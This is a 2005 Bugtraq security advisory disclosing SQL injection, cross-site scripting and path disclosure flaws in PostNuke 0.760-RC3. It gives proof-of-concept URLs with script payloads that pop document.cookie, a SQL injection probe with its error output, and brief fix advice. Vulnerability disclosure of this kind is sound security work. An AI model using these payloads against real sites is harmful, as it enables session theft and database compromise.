Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3

From: dcrab (dcrab_at_hackerscenter.com)
Date: 04/08/05

  • Next message: Marc Schoenefeld: "MacOSX Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability"
    Date: 8 Apr 2005 02:36:02 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Dcrab 's Security Advisory
    [Hsc Security Group] http://www.hackerscenter.com/
    [dP Security] http://digitalparadox.org/

    Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

    GET INFORMED FIRST ABOUT MY ADVISORIES http://www.digitalparadox.org

    Severity: Medium
    Title: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3
    Date: 08/04/2005

    Vendor: PostNuke
    Vendor Website: http://www.postnuke.com
    Summary: There are, sql injection, xss and path disclosure vulnerabilities in postnuke 0.760-rc3.

    Proof of Concept Exploits:

    http://localhost/admin.php?module="><script>alert(document.cookie)</script>&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480
    Pops cookie

    http://localhost/modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480
    SQL INJECTION (look wayyy on the bottom of the page)

    DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for
    the right syntax to use near '\'SQL_INJECTION' at line 23

    http://localhost/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id='&POSTNUKESID=355776cfb622466924a7096d4471a480
    Server Path disclosure

    Fatal error: Call to a member function on a non-object in /home/httpd/vhosts/localhost/httpdocs/modules/Reviews/index.php on line 976

    http://localhost/user.php?op="><script>alert(document.cookie)</script>&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
    Pops cookie

    Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input
    validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.

    Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

    Author:
    These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel
    free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
    Lookout or my soon to come out book on Secure coding with php.

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

    iQA/AwUBQlXvwyZV5e8av/DUEQKa2QCgiDjVDkjyVdrXhbww/3zI8ksr8/EAnikN
    BDxd/CIvzHYmLQAyb5suDR8K
    =7MBl
    -----END PGP SIGNATURE-----


  • Next message: Marc Schoenefeld: "MacOSX Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability"

    Relevant Pages